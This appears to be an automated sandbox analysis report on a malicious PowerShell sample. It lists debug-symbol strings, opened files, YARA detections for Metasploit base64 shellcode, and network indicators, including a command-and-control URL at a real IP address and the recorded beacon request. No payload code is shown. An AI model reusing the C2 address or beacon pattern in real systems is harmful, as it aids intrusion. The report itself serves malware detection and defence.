Source:	Binary string: onfiguration.Install.pdb source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: System.DirectoryServices.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: nsi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.pdb@ source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb""F` source: WerFault.exe, 0000000D.00000003.738761846.00000000052A6000.00000004.00000001.sdmp
Source:	Binary string: Microsoft.Management.Infrastructure.pdb4 source: WER4735.tmp.dmp.13.dr
Source:	Binary string: clrjit.pdb9 source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: System.Configuration.Install.pdbH source: WER4735.tmp.dmp.13.dr
Source:	Binary string: gpapi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 0000000D.00000003.739523880.0000000005284000.00000004.00000001.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER4735.tmp.dmp.13.dr
Source:	Binary string: System.Configuration.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: ole32.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: ore.pdb{{ source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
Source:	Binary string: iertutil.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: System.Transactions.pdb% source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: System.Configuration.Install.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: System.Management.Automation.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: msasn1.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.pdb source: WER4735.tmp.dmp.13.dr
Source:	Binary string: mscorlib.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdbf source: WER4735.tmp.dmp.13.dr
Source:	Binary string: System.Management.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000D.00000003.739523880.0000000005284000.00000004.00000001.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
Source:	Binary string: Microsoft.Management.Infrastructure.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: System.Configuration.ni.pdbRSDSO* source: WER4735.tmp.dmp.13.dr
Source:	Binary string: dpapi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: secur32.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: powershell.pdb source: WerFault.exe, 0000000D.00000003.741455991.0000000005270000.00000004.00000040.sdmp
Source:	Binary string: winhttp.pdbo source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: version.pdb/ source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS source: WER4735.tmp.dmp.13.dr
Source:	Binary string: System.Numerics.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: t.PowerShell.ConsoleHost.pdb" source: WerFault.exe, 0000000D.00000003.738761846.00000000052A6000.00000004.00000001.sdmp
Source:	Binary string: wininet.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: System.Management.Automation.pdb" source: WerFault.exe, 0000000D.00000003.738761846.00000000052A6000.00000004.00000001.sdmp
Source:	Binary string: System.Core.ni.pdbRSDSD source: WER4735.tmp.dmp.13.dr
Source:	Binary string: MpOAV.pdbs source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: System.Management.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: nsi.pdb_ source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: shlwapi.pdb5 source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb- source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.PowerShell.Security.pdbD source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: dpapi.pdbQ source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.Management.Infrastructure.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: MpClient.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: shell32.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
Source:	Binary string: wininet.pdb_ source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: userenv.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
Source:	Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: diasymreader.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: irectoryServices.pdb source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
Source:	Binary string: System.Data.pdbu source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: winhttp.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000D.00000003.739523880.0000000005284000.00000004.00000001.sdmp
Source:	Binary string: System.Transactions.pdb\ source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: OnDemandConnRouteHelper.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: System.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: t.PowerShell.ConsoleHost.pdb source: WerFault.exe, 0000000D.00000003.738761846.00000000052A6000.00000004.00000001.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.PowerShell.Security.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: WLDP.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER4735.tmp.dmp.13.dr
Source:	Binary string: clrjit.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS)m source: WER4735.tmp.dmp.13.dr
Source:	Binary string: ll.Commands.Utility.pdb^ source: powershell.exe, 00000005.00000000.706645322.0000000008789000.00000004.00000001.sdmp
Source:	Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000D.00000003.739523880.0000000005284000.00000004.00000001.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: mscoree.pdb3 source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: ransactions.pdbnn source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
Source:	Binary string: wmswsock.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: version.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: wintrust.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
Source:	Binary string: System.Xml.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: System.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: ore.ni.pdb source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
Source:	Binary string: System.Management.Automation.pdb@ source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: ore.pdb source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: psapi.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb2 source: powershell.exe, 00000005.00000000.702935630.00000000077BB000.00000004.00000001.sdmp
Source:	Binary string: System.ni.pdbT3yk source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
Source:	Binary string: System.Core.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
Source:	Binary string: mscoreei.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
Source:	Binary string: Amsi.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
Source:	Binary string: umerics.pdb source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmp, WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: ransactions.pdb source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
Source:	Binary string: System.Transactions.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
Source:	Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: wuser32.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmp
Source:	Binary string: System.ni.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
Source:	Binary string: Microsoft.PowerShell.Security.pdbp source: WER4735.tmp.dmp.13.dr
Source:	Binary string: crypt32.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: http://206.189.69.35/x1Fm

Source: Joe Sandbox View

IP Address: 206.189.69.35 206.189.69.35

Source: Joe Sandbox View

ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS

Source: global traffic

HTTP traffic detected: GET /x1Fm HTTP/1.1User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MATP; MATP)Host: 206.189.69.35Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 206.189.69.35
Source: unknown	TCP traffic detected without corresponding DNS query: 206.189.69.35
Source: unknown	TCP traffic detected without corresponding DNS query: 206.189.69.35
Source: unknown	TCP traffic detected without corresponding DNS query: 206.189.69.35
Source: unknown	TCP traffic detected without corresponding DNS query: 206.189.69.35
Source: unknown	TCP traffic detected without corresponding DNS query: 206.189.69.35

Source: global traffic

HTTP traffic detected: GET /x1Fm HTTP/1.1User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MATP; MATP)Host: 206.189.69.35Connection: Keep-AliveCache-Control: no-cache

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 06 Jul 2021 09:59:26 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 275Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 32 30 36 2e 31 38 39 2e 36 39 2e 33 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at 206.189.69.35 Port 80</address></body></html>

Source: powershell.exe, 00000005.00000000.706645322.0000000008789000.00000004.00000001.sdmp	String found in binary or memory: http://206.189.69.35/x1Fm
Source: powershell.exe, 00000000.00000002.772023665.000001CDB7E38000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: WerFault.exe, 0000000D.00000002.762935904.0000000004CE4000.00000004.00000001.sdmp	String found in binary or memory: http://crl.m
Source: powershell.exe, 00000000.00000002.772612102.000001CDB8137000.00000004.00000001.sdmp	String found in binary or memory: http://crl.osofts/Microt0
Source: WerFault.exe, 0000000D.00000003.730419455.0000000005770000.00000004.00000001.sdmp	String found in binary or memory: http://localhost/wsman:Microsoft.PowerShell.Workflow
Source: powershell.exe, 00000000.00000002.770588360.000001CDAFDB8000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.755463812.000001CD9FE21000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
Source: powershell.exe, 00000000.00000002.754811598.000001CD9FC11000.00000004.00000001.sdmp, powershell.exe, 00000005.00000000.710315225.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
Source: WerFault.exe, 0000000D.00000003.731559206.0000000005480000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
Source: powershell.exe, 00000000.00000002.755463812.000001CD9FE21000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.770588360.000001CDAFDB8000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.770588360.000001CDAFDB8000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.770588360.000001CDAFDB8000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.755463812.000001CD9FE21000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.767490494.000001CDA1709000.00000004.00000001.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.770588360.000001CDAFDB8000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: 00000000.00000002.756668339.000001CDA0120000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: 00000005.00000000.710638243.0000000004B40000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: 00000005.00000000.699444803.0000000004B40000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: Process Memory Space: powershell.exe PID: 7144, type: MEMORY	Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: Process Memory Space: powershell.exe PID: 5964, type: MEMORY	Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth
Source: C:\Users\user\Documents\20210706\PowerShell_transcript.745773.TjwFMGya.20210706115904.txt, type: DROPPED	Matched rule: Metasploit Payloads - file msf-ref.ps1 Author: Florian Roth

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFA35C026AD	0_2_00007FFA35C026AD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFA35C009BD	0_2_00007FFA35C009BD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFA35C0157F	0_2_00007FFA35C0157F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFA35C01D70	0_2_00007FFA35C01D70

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 2552

Source: a.ps1, type: SAMPLE	Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
Source: 00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000000.702983219.00000000077F8000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
Source: 00000000.00000002.756668339.000001CDA0120000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.756668339.000001CDA0120000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
Source: 00000005.00000000.710638243.0000000004B40000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000000.710638243.0000000004B40000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
Source: 00000005.00000000.699444803.0000000004B40000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000005.00000000.699444803.0000000004B40000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
Source: 00000000.00000002.758338125.000001CDA06AB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
Source: 00000000.00000002.772859194.000001CDB8350000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
